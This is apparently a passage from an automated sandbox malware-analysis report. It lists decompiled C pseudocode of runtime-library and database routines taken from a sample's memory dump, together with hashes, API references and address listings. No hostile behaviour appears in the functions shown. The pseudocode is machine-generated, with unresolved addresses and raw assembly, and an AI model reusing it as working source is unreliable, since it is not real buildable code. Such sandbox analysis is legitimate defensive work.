                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction ID: f3c1673cfcd6a07b26c74d5ae22b66f22e77f9129f58a32b010323b10b93e6ce
                                                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction Fuzzy Hash: 16014B7240014EBBCF226E84DC018EE3F62BF18358B588556FB1859131DB36CAB1FB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FF1B47 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E00FF1B47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E00FF216F(_t27, _t29, _t30, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E00FEA397(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E00FF23D0(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E00FF1939(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E00FEA367(_t25, _t29);
					return _t25;
				}
				return _t25;
			}













                                                                                                                    0x00ff1b4a
                                                                                                                    0x00ff1b4f
                                                                                                                    0x00ff1b52
                                                                                                                    0x00ff1b54
                                                                                                                    0x00ff1b57
                                                                                                                    0x00ff1b5a
                                                                                                                    0x00ff1b5b
                                                                                                                    0x00ff1b5e
                                                                                                                    0x00ff1b63
                                                                                                                    0x00ff1b63
                                                                                                                    0x00ff1b66
                                                                                                                    0x00ff1b6a
                                                                                                                    0x00ff1b6d
                                                                                                                    0x00ff1b72
                                                                                                                    0x00ff1b6f
                                                                                                                    0x00ff1b6f
                                                                                                                    0x00ff1b6f
                                                                                                                    0x00ff1b75
                                                                                                                    0x00ff1b7a
                                                                                                                    0x00ff1b7b
                                                                                                                    0x00ff1b7e
                                                                                                                    0x00ff1b80
                                                                                                                    0x00ff1b83
                                                                                                                    0x00ff1b86
                                                                                                                    0x00ff1b87
                                                                                                                    0x00ff1b8f
                                                                                                                    0x00ff1b94
                                                                                                                    0x00ff1b98
                                                                                                                    0x00ff1b9e
                                                                                                                    0x00ff1ba1
                                                                                                                    0x00ff1ba4
                                                                                                                    0x00ff1ba7
                                                                                                                    0x00ff1ba8
                                                                                                                    0x00ff1bab
                                                                                                                    0x00ff1bb6
                                                                                                                    0x00ff1bba
                                                                                                                    0x00000000
                                                                                                                    0x00ff1bba
                                                                                                                    0x00ff1bc1

                                                                                                                    APIs
                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 00FF1B5E
                                                                                                                      • Part of subcall function 00FF216F: ___BuildCatchObjectHelper.LIBCMT ref: 00FF21A1
                                                                                                                      • Part of subcall function 00FF216F: ___AdjustPointer.LIBCMT ref: 00FF21B8
                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00FF1B75
                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 00FF1B87
                                                                                                                    • CallCatchBlock.LIBCMT ref: 00FF1BAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2901542994-0
                                                                                                                    • Opcode ID: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction ID: aafc178a7b8e937784cffceefe0c5d74eecdea99c40e372c4437004adf704a69
                                                                                                                    • Opcode Fuzzy Hash: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction Fuzzy Hash: 9A01D73240014DFBCF129F55CC01EEA3BAAFF88754F154114FA1865131D776E861EBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0106D5F3 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 21%
                                                                                                                    			E0106D5F3(void* __ecx, intOrPtr _a4) {
				intOrPtr _v4;
				void* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t22;

				_t18 = _t20;
				E0106D5C1(__ecx, _a4);
				 *0x474180(_a4, _t17);
				asm("int3");
				_push(_t18);
				E01070ED0(_t22);
				E01070F2D(_t14, _v4);
				E0106D6D4(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E0106D770(_t10, _t15, _t16, _t22);
			}












                                                                                                                    0x0106d5f4
                                                                                                                    0x0106d5f9
                                                                                                                    0x0106d602
                                                                                                                    0x0106d608
                                                                                                                    0x0106d609
                                                                                                                    0x0106d60c
                                                                                                                    0x0106d614
                                                                                                                    0x0106d61f
                                                                                                                    0x0106d624
                                                                                                                    0x0106d625
                                                                                                                    0x0106d627
                                                                                                                    0x0106d629
                                                                                                                    0x0106d633

                                                                                                                    APIs
                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 0106D5F9
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 0106D60C
                                                                                                                      • Part of subcall function 01070ED0: __NMSG_WRITE.LIBCMT ref: 01070EF7
                                                                                                                      • Part of subcall function 01070ED0: __NMSG_WRITE.LIBCMT ref: 01070F01
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0106D614
                                                                                                                      • Part of subcall function 01070F2D: ___crtMessageBoxW.LIBCMT ref: 0107106D
                                                                                                                      • Part of subcall function 0106D6D4: _doexit.LIBCMT ref: 0106D6DE
                                                                                                                    • _doexit.LIBCMT ref: 0106D62B
                                                                                                                      • Part of subcall function 0106D770: __lock.LIBCMT ref: 0106D77E
                                                                                                                      • Part of subcall function 0106D770: __initterm.LIBCMT ref: 0106D846
                                                                                                                      • Part of subcall function 0106D770: __initterm.LIBCMT ref: 0106D857
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ___crt__initterm_doexit$ExitMessageProcess__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1204012526-0
                                                                                                                    • Opcode ID: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction ID: 08367aa6cc254f864c118cbd2cba00fc15530213e0fb0b3e613ed0ea9e660075
                                                                                                                    • Opcode Fuzzy Hash: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction Fuzzy Hash: AEE0EC3164420E7BDA043B91FC46FD83A1EEF21B50F800424FA88188A1EEE26E915696
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FBB807 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 425COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00FBB807(signed int _a4, intOrPtr* _a8, intOrPtr* _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char _v44;
				char _v56;
				signed char _v88;
				signed char _v91;
				signed char _v92;
				char _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t131;
				intOrPtr _t139;
				void* _t150;
				void* _t161;
				intOrPtr _t165;
				intOrPtr* _t167;
				intOrPtr* _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				signed int _t181;
				char* _t183;
				signed int _t184;
				intOrPtr _t187;
				intOrPtr _t189;
				intOrPtr _t191;
				signed int _t194;
				signed int _t195;
				intOrPtr _t197;
				intOrPtr _t200;
				signed int _t209;
				signed int _t210;
				intOrPtr _t211;
				signed char _t212;
				void* _t213;
				intOrPtr* _t214;
				intOrPtr _t221;
				intOrPtr _t222;
				signed short _t225;
				intOrPtr _t226;
				intOrPtr _t229;
				intOrPtr* _t232;
				intOrPtr* _t235;
				intOrPtr* _t239;
				signed int _t240;
				intOrPtr* _t242;
				intOrPtr* _t243;
				signed int _t244;
				signed int _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t255;

				_v8 =  *0x481f80 ^ _t246;
				_t131 = _a4;
				_t243 = _a8;
				_v144 = _a12;
				_v120 = _t131;
				_v116 = _t243;
				_v124 = 0;
				_v112 = 0;
				if(_t131 == 0) {
					L9:
					_v132 = 0;
				} else {
					_t239 = 0x476238;
					while(1) {
						_t240 =  *_t131;
						if(_t240 !=  *_t239) {
							break;
						}
						if(_t240 == 0) {
							L6:
							_t209 = 0;
						} else {
							_t240 =  *((intOrPtr*)(_t131 + 1));
							if(_t240 !=  *((intOrPtr*)(_t239 + 1))) {
								break;
							} else {
								_t131 = _t131 + 2;
								_t239 = _t239 + 2;
								if(_t240 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						_v132 = 1;
						if(_t209 != 0) {
							goto L9;
						}
						goto L10;
					}
					asm("sbb eax, eax");
					_t209 = _t131 | 0x00000001;
					goto L8;
				}
				L10:
				_t210 =  *_t243;
				_v128 = _t210;
				_t242 = E00FC91B7(0x1c);
				_t248 = _t247 + 4;
				if(_t242 == 0) {
					L17:
					return E00FE72F2(7, _t210, _v8 ^ _t246, _t240, _t242, _t243);
				} else {
					asm("xorps xmm0, xmm0");
					asm("movq [edi], xmm0");
					asm("movq [edi+0x8], xmm0");
					asm("movq [edi+0x10], xmm0");
					 *((intOrPtr*)(_t242 + 0x18)) = 0;
					 *((char*)(_t242 + 8)) = 0;
					 *_t242 = _t243;
					if(_v132 != 0) {
						L46:
						_t244 = E00FC91B7(0x50);
						_t249 = _t248 + 4;
						if(_t244 == 0) {
							_t211 = 7;
							goto L88;
						} else {
							E00FE7C87(_t244, 0, 0x50);
							_t221 = E00FCAA87(_t210, _t244, _v120, 0x4c, _a16, _a20);
							_t249 = _t249 + 0x24;
							_v112 = _t221;
							if(_t221 != 0) {
								L84:
								_t211 = _v112;
								goto L85;
							} else {
								_t222 = E00FCAFF7( *_t244, 0x64,  &_v108);
								_t249 = _t249 + 0xc;
								_v112 = _t222;
								if(_t222 != 0) {
									goto L84;
								} else {
									 *((intOrPtr*)(_t244 + 4)) = _v116;
									_t150 =  *_t244;
									_t54 = _t244 + 0x14; // 0x14
									_t240 = _t54;
									 *((intOrPtr*)(_t150 + 0x8c)) = 0x416140;
									 *(_t150 + 0x90) = _t244;
									 *(_t242 + 4) = _t244;
									 *((intOrPtr*)( *_t244 + 0x94)) = 0x4240d0;
									 *((intOrPtr*)(_t244 + 8)) = _t222;
									 *((intOrPtr*)(_t244 + 0xc)) = _t222;
									 *((char*)(_t244 + 0x10)) =  *((intOrPtr*)( *_t244 + 0xc));
									_t225 = (_v92 & 0x000000ff) << 0x00000008 | _v91 & 0x000000ff;
									 *_t240 = _t225;
									if(_t225 < 0x200 || _t225 > 0x8000 || (_t225 & 0x0000ffff & (_t225 & 0x0000ffff) - 0x00000001) != 0) {
										 *_t240 = 0;
										if(_v120 != 0 && _v132 == 0) {
											 *((short*)(_t244 + 0x12)) = 0;
										}
										_t212 = 0;
									} else {
										_t212 = _v88;
										 *((char*)(_t244 + 0x11)) = 1;
										 *((char*)(_t244 + 0x12)) = E00FC5BC7( &_v56) & 0xffffff00 | _t178 != 0x00000000;
										_t181 = E00FC5BC7( &_v44);
										_t249 = _t249 + 8;
										 *((char*)(_t244 + 0x13)) = _t181 & 0xffffff00 | _t181 != 0x00000000;
										_t78 = _t244 + 0x14; // 0x14
										_t240 = _t78;
									}
									_t226 = E00FCB197( *_t244, _t240, _t212 & 0x000000ff);
									_t249 = _t249 + 0xc;
									_v112 = _t226;
									if(_t226 != 0) {
										goto L84;
									} else {
										 *((short*)(_t244 + 0x16)) =  *(_t244 + 0x14) - (_t212 & 0x000000ff);
										if( *((char*)(_t242 + 9)) == 0) {
											goto L83;
										} else {
											 *((intOrPtr*)(_t244 + 0x38)) = 1;
											if( *0x48180c != 0) {
												_t161 =  *0x481848(2);
												_t249 = _t249 + 4;
												_t213 = _t161;
												if( *0x48180c == 0) {
													goto L62;
												} else {
													_t173 =  *0x481848(0);
													_t249 = _t249 + 4;
													 *((intOrPtr*)(_t244 + 0x30)) = _t173;
													if(_t173 != 0) {
														goto L62;
													} else {
														_t100 = _t173 + 7; // 0x7
														_t211 = _t100;
														 *((char*)(_v116 + 0x1e)) = 0;
														L85:
														_t145 =  *_t244;
														if( *_t244 != 0) {
															E00FCA4B7(_t211, _t242, _t145);
															_t249 = _t249 + 4;
														}
														L88:
														E00F97247(_t244);
														E00F97247(_t242);
														 *_v144 = 0;
													}
												}
											} else {
												_t213 = 0;
												L62:
												E00F95CF7(_t213);
												 *(_t244 + 0x3c) =  *0x487010;
												 *0x487010 = _t244;
												E00F95D37(_t213);
												goto L63;
											}
										}
									}
								}
							}
						}
						goto L89;
					} else {
						_t183 = _v120;
						if(_t183 == 0 ||  *_t183 == 0 ||  *0x4818bc == 0) {
							goto L46;
						} else {
							_t19 = _t210 + 8; // 0x7
							_t243 =  *_t19 + 1;
							_t184 = E00FC91B7(_t243);
							 *((char*)(_t242 + 9)) = 1;
							 *(_v116 + 0xc) =  *(_v116 + 0xc) | 0x00080000;
							_t252 = _t248 + 4;
							_v140 = _t184;
							if(_t184 != 0) {
								_t26 = _t210 + 0x24; // 0x8468b00
								 *((intOrPtr*)( *_t26))(_t210, _v120, _t243, _t184);
								_t253 = _t252 + 0x10;
								if( *0x48180c != 0) {
									_t187 =  *0x481848(4);
									_t253 = _t253 + 4;
								} else {
									_t187 = 0;
								}
								_v124 = _t187;
								E00F95CF7(_t187);
								_t254 = _t253 + 4;
								if( *0x48180c != 0) {
									_t189 =  *0x481848(2);
									_t254 = _t254 + 4;
								} else {
									_t189 = 0;
								}
								_v136 = _t189;
								E00F95CF7(_t189);
								_t244 =  *0x487010;
								_t255 = _t254 + 4;
								if(_t244 == 0) {
									L43:
									_t191 = _v136;
									if(_t191 != 0) {
										 *0x481858(_t191);
										_t255 = _t255 + 4;
									}
									E00F97247(_v140);
									if(_t244 != 0) {
										L63:
										if( *((char*)(_t242 + 9)) == 0) {
											L83:
											_t211 = _v112;
											 *_v144 = _t242;
										} else {
											_t165 = _v116;
											_t240 = 0;
											_t244 =  *(_t165 + 4);
											if(_t244 <= 0) {
												goto L83;
											} else {
												_t167 =  *((intOrPtr*)(_t165 + 8)) + 4;
												while(1) {
													_t229 =  *_t167;
													if(_t229 != 0 &&  *((char*)(_t229 + 9)) != 0) {
														break;
													}
													_t240 = _t240 + 1;
													_t167 = _t167 + 0x10;
													if(_t240 < _t244) {
														continue;
													} else {
														_t211 = _v112;
														 *_v144 = _t242;
													}
													goto L89;
												}
												_t169 = _t229 + 0x18;
												while( *((intOrPtr*)(_t229 + 0x18)) != 0) {
													_t229 =  *_t169;
													_t169 = _t229 + 0x18;
												}
												_t240 =  *(_t242 + 4);
												if(_t240 >=  *((intOrPtr*)(_t229 + 4))) {
													if( *((intOrPtr*)(_t229 + 0x14)) != 0) {
														while(1) {
															_t171 =  *((intOrPtr*)(_t229 + 0x14));
															if( *((intOrPtr*)(_t171 + 4)) >= _t240) {
																goto L80;
															}
															_t229 = _t171;
															if( *((intOrPtr*)(_t229 + 0x14)) != 0) {
																continue;
															}
															goto L80;
														}
													}
													L80:
													_t170 =  *((intOrPtr*)(_t229 + 0x14));
													 *((intOrPtr*)(_t242 + 0x14)) = _t170;
													 *((intOrPtr*)(_t242 + 0x18)) = _t229;
													if(_t170 != 0) {
														 *((intOrPtr*)(_t170 + 0x18)) = _t242;
													}
													 *((intOrPtr*)(_t229 + 0x14)) = _t242;
													goto L83;
												} else {
													_t211 = _v112;
													 *((intOrPtr*)(_t242 + 0x14)) = _t229;
													 *((intOrPtr*)(_t242 + 0x18)) = 0;
													 *((intOrPtr*)(_t229 + 0x18)) = _t242;
													 *_v144 = _t242;
												}
											}
										}
									} else {
										goto L46;
									}
									L89:
									_t139 = _v124;
									if(_t139 != 0) {
										 *0x481858(_t139);
									}
									return E00FE72F2(_t211, _t211, _v8 ^ _t246, _t240, _t242, _t244);
								} else {
									do {
										_t214 =  *_t244;
										_t194 = _v140;
										_t31 = _t214 + 0x84; // 0xe8560001
										_t232 =  *_t31;
										while(1) {
											_t240 =  *_t194;
											if(_t240 !=  *_t232) {
												break;
											}
											if(_t240 == 0) {
												L30:
												_t195 = 0;
											} else {
												_t240 =  *((intOrPtr*)(_t194 + 1));
												if(_t240 !=  *((intOrPtr*)(_t232 + 1))) {
													break;
												} else {
													_t194 = _t194 + 2;
													_t232 = _t232 + 2;
													if(_t240 != 0) {
														continue;
													} else {
														goto L30;
													}
												}
											}
											L32:
											if(_t195 != 0 ||  *_t214 != _v128) {
												goto L34;
											} else {
												_t197 = _v116;
												_t240 =  *((intOrPtr*)(_t197 + 4)) - 1;
												if(_t240 < 0) {
													L41:
													 *(_t242 + 4) = _t244;
													 *((intOrPtr*)(_t244 + 0x38)) =  *((intOrPtr*)(_t244 + 0x38)) + 1;
													L42:
													_t210 = _v128;
													goto L43;
												} else {
													_t235 = (_t240 << 4) +  *((intOrPtr*)(_t197 + 8)) + 4;
													while(1) {
														_t200 =  *_t235;
														if(_t200 != 0 &&  *((intOrPtr*)(_t200 + 4)) == _t244) {
															break;
														}
														_t235 = _t235 - 0x10;
														_t240 = _t240 - 1;
														if(_t240 >= 0) {
															continue;
														} else {
															goto L41;
														}
														goto L92;
													}
													E00F95D37(_v136);
													E00F95D37(_v124);
													E00F97247(_v140);
													E00F97247(_t242);
													return E00FE72F2(0x13, _t214, _v8 ^ _t246, _t240, _t242, _t244);
												}
											}
											goto L92;
										}
										asm("sbb eax, eax");
										_t195 = _t194 | 0x00000001;
										goto L32;
										L34:
										_t244 =  *(_t244 + 0x3c);
									} while (_t244 != 0);
									goto L42;
								}
							} else {
								E00F97247(_t242);
								goto L17;
							}
						}
					}
				}
				L92:
			}




































































                                                                                                                    0x00fbb817
                                                                                                                    0x00fbb81d
                                                                                                                    0x00fbb822
                                                                                                                    0x00fbb825
                                                                                                                    0x00fbb82e
                                                                                                                    0x00fbb831
                                                                                                                    0x00fbb834
                                                                                                                    0x00fbb837
                                                                                                                    0x00fbb83c
                                                                                                                    0x00fbb877
                                                                                                                    0x00fbb877
                                                                                                                    0x00fbb83e
                                                                                                                    0x00fbb83e
                                                                                                                    0x00fbb847
                                                                                                                    0x00fbb847
                                                                                                                    0x00fbb84b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb84f
                                                                                                                    0x00fbb863
                                                                                                                    0x00fbb863
                                                                                                                    0x00fbb851
                                                                                                                    0x00fbb851
                                                                                                                    0x00fbb857
                                                                                                                    0x00000000
                                                                                                                    0x00fbb859
                                                                                                                    0x00fbb859
                                                                                                                    0x00fbb85c
                                                                                                                    0x00fbb861
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb861
                                                                                                                    0x00fbb857
                                                                                                                    0x00fbb86c
                                                                                                                    0x00fbb86c
                                                                                                                    0x00fbb875
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb875
                                                                                                                    0x00fbb867
                                                                                                                    0x00fbb869
                                                                                                                    0x00000000
                                                                                                                    0x00fbb869
                                                                                                                    0x00fbb87e
                                                                                                                    0x00fbb87e
                                                                                                                    0x00fbb882
                                                                                                                    0x00fbb88a
                                                                                                                    0x00fbb88c
                                                                                                                    0x00fbb891
                                                                                                                    0x00fbb90c
                                                                                                                    0x00fbb91f
                                                                                                                    0x00fbb893
                                                                                                                    0x00fbb897
                                                                                                                    0x00fbb89a
                                                                                                                    0x00fbb89e
                                                                                                                    0x00fbb8a3
                                                                                                                    0x00fbb8a8
                                                                                                                    0x00fbb8af
                                                                                                                    0x00fbb8b3
                                                                                                                    0x00fbb8b5
                                                                                                                    0x00fbba2f
                                                                                                                    0x00fbba36
                                                                                                                    0x00fbba38
                                                                                                                    0x00fbba3d
                                                                                                                    0x00fbbce3
                                                                                                                    0x00000000
                                                                                                                    0x00fbba43
                                                                                                                    0x00fbba48
                                                                                                                    0x00fbba5f
                                                                                                                    0x00fbba61
                                                                                                                    0x00fbba64
                                                                                                                    0x00fbba69
                                                                                                                    0x00fbbccf
                                                                                                                    0x00fbbccf
                                                                                                                    0x00000000
                                                                                                                    0x00fbba6f
                                                                                                                    0x00fbba7c
                                                                                                                    0x00fbba7e
                                                                                                                    0x00fbba81
                                                                                                                    0x00fbba86
                                                                                                                    0x00000000
                                                                                                                    0x00fbba8c
                                                                                                                    0x00fbba8f
                                                                                                                    0x00fbba92
                                                                                                                    0x00fbba94
                                                                                                                    0x00fbba94
                                                                                                                    0x00fbba97
                                                                                                                    0x00fbbaa1
                                                                                                                    0x00fbbaa7
                                                                                                                    0x00fbbaac
                                                                                                                    0x00fbbab8
                                                                                                                    0x00fbbabb
                                                                                                                    0x00fbbac1
                                                                                                                    0x00fbbad0
                                                                                                                    0x00fbbad8
                                                                                                                    0x00fbbade
                                                                                                                    0x00fbbb6a
                                                                                                                    0x00fbbb70
                                                                                                                    0x00fbbb77
                                                                                                                    0x00fbbb77
                                                                                                                    0x00fbbb7b
                                                                                                                    0x00fbbaf8
                                                                                                                    0x00fbbaf8
                                                                                                                    0x00fbbaff
                                                                                                                    0x00fbbb0d
                                                                                                                    0x00fbbb14
                                                                                                                    0x00fbbb19
                                                                                                                    0x00fbbb21
                                                                                                                    0x00fbbb24
                                                                                                                    0x00fbbb24
                                                                                                                    0x00fbbb24
                                                                                                                    0x00fbbb89
                                                                                                                    0x00fbbb8b
                                                                                                                    0x00fbbb8e
                                                                                                                    0x00fbbb93
                                                                                                                    0x00000000
                                                                                                                    0x00fbbb99
                                                                                                                    0x00fbbba3
                                                                                                                    0x00fbbbab
                                                                                                                    0x00000000
                                                                                                                    0x00fbbbb1
                                                                                                                    0x00fbbbb8
                                                                                                                    0x00fbbbbf
                                                                                                                    0x00fbbc2d
                                                                                                                    0x00fbbc33
                                                                                                                    0x00fbbc3d
                                                                                                                    0x00fbbc3f
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc41
                                                                                                                    0x00fbbc43
                                                                                                                    0x00fbbc49
                                                                                                                    0x00fbbc4c
                                                                                                                    0x00fbbc51
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc57
                                                                                                                    0x00fbbc57
                                                                                                                    0x00fbbc57
                                                                                                                    0x00fbbc5d
                                                                                                                    0x00fbbcd2
                                                                                                                    0x00fbbcd2
                                                                                                                    0x00fbbcd6
                                                                                                                    0x00fbbcd9
                                                                                                                    0x00fbbcde
                                                                                                                    0x00fbbcde
                                                                                                                    0x00fbbce8
                                                                                                                    0x00fbbce9
                                                                                                                    0x00fbbcef
                                                                                                                    0x00fbbcfd
                                                                                                                    0x00fbbcfd
                                                                                                                    0x00fbbc51
                                                                                                                    0x00fbbbc1
                                                                                                                    0x00fbbbc1
                                                                                                                    0x00fbbbc3
                                                                                                                    0x00fbbbc4
                                                                                                                    0x00fbbbcf
                                                                                                                    0x00fbbbd2
                                                                                                                    0x00fbbbd8
                                                                                                                    0x00000000
                                                                                                                    0x00fbbbdd
                                                                                                                    0x00fbbbbf
                                                                                                                    0x00fbbbab
                                                                                                                    0x00fbbb93
                                                                                                                    0x00fbba86
                                                                                                                    0x00fbba69
                                                                                                                    0x00000000
                                                                                                                    0x00fbb8bb
                                                                                                                    0x00fbb8bb
                                                                                                                    0x00fbb8c0
                                                                                                                    0x00000000
                                                                                                                    0x00fbb8dc
                                                                                                                    0x00fbb8dc
                                                                                                                    0x00fbb8df
                                                                                                                    0x00fbb8e1
                                                                                                                    0x00fbb8e9
                                                                                                                    0x00fbb8ed
                                                                                                                    0x00fbb8f4
                                                                                                                    0x00fbb8f7
                                                                                                                    0x00fbb8ff
                                                                                                                    0x00fbb921
                                                                                                                    0x00fbb929
                                                                                                                    0x00fbb92b
                                                                                                                    0x00fbb935
                                                                                                                    0x00fbb93d
                                                                                                                    0x00fbb943
                                                                                                                    0x00fbb937
                                                                                                                    0x00fbb937
                                                                                                                    0x00fbb937
                                                                                                                    0x00fbb947
                                                                                                                    0x00fbb94a
                                                                                                                    0x00fbb94f
                                                                                                                    0x00fbb959
                                                                                                                    0x00fbb961
                                                                                                                    0x00fbb967
                                                                                                                    0x00fbb95b
                                                                                                                    0x00fbb95b
                                                                                                                    0x00fbb95b
                                                                                                                    0x00fbb96b
                                                                                                                    0x00fbb971
                                                                                                                    0x00fbb976
                                                                                                                    0x00fbb97c
                                                                                                                    0x00fbb981
                                                                                                                    0x00fbba05
                                                                                                                    0x00fbba05
                                                                                                                    0x00fbba0d
                                                                                                                    0x00fbba10
                                                                                                                    0x00fbba16
                                                                                                                    0x00fbba16
                                                                                                                    0x00fbba1f
                                                                                                                    0x00fbba29
                                                                                                                    0x00fbbbe0
                                                                                                                    0x00fbbbe4
                                                                                                                    0x00fbbcc2
                                                                                                                    0x00fbbcc8
                                                                                                                    0x00fbbccb
                                                                                                                    0x00fbbbea
                                                                                                                    0x00fbbbea
                                                                                                                    0x00fbbbed
                                                                                                                    0x00fbbbef
                                                                                                                    0x00fbbbf4
                                                                                                                    0x00000000
                                                                                                                    0x00fbbbfa
                                                                                                                    0x00fbbbfd
                                                                                                                    0x00fbbc07
                                                                                                                    0x00fbbc07
                                                                                                                    0x00fbbc0b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc13
                                                                                                                    0x00fbbc14
                                                                                                                    0x00fbbc19
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc1b
                                                                                                                    0x00fbbc21
                                                                                                                    0x00fbbc24
                                                                                                                    0x00fbbc24
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc19
                                                                                                                    0x00fbbc67
                                                                                                                    0x00fbbc6a
                                                                                                                    0x00fbbc6c
                                                                                                                    0x00fbbc72
                                                                                                                    0x00fbbc72
                                                                                                                    0x00fbbc77
                                                                                                                    0x00fbbc7d
                                                                                                                    0x00fbbc9d
                                                                                                                    0x00fbbc9f
                                                                                                                    0x00fbbc9f
                                                                                                                    0x00fbbca5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbbca7
                                                                                                                    0x00fbbcad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbbcad
                                                                                                                    0x00fbbc9f
                                                                                                                    0x00fbbcaf
                                                                                                                    0x00fbbcaf
                                                                                                                    0x00fbbcb2
                                                                                                                    0x00fbbcb5
                                                                                                                    0x00fbbcba
                                                                                                                    0x00fbbcbc
                                                                                                                    0x00fbbcbc
                                                                                                                    0x00fbbcbf
                                                                                                                    0x00000000
                                                                                                                    0x00fbbc7f
                                                                                                                    0x00fbbc85
                                                                                                                    0x00fbbc88
                                                                                                                    0x00fbbc8b
                                                                                                                    0x00fbbc92
                                                                                                                    0x00fbbc95
                                                                                                                    0x00fbbc95
                                                                                                                    0x00fbbc7d
                                                                                                                    0x00fbbbf4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbbd03
                                                                                                                    0x00fbbd03
                                                                                                                    0x00fbbd08
                                                                                                                    0x00fbbd0b
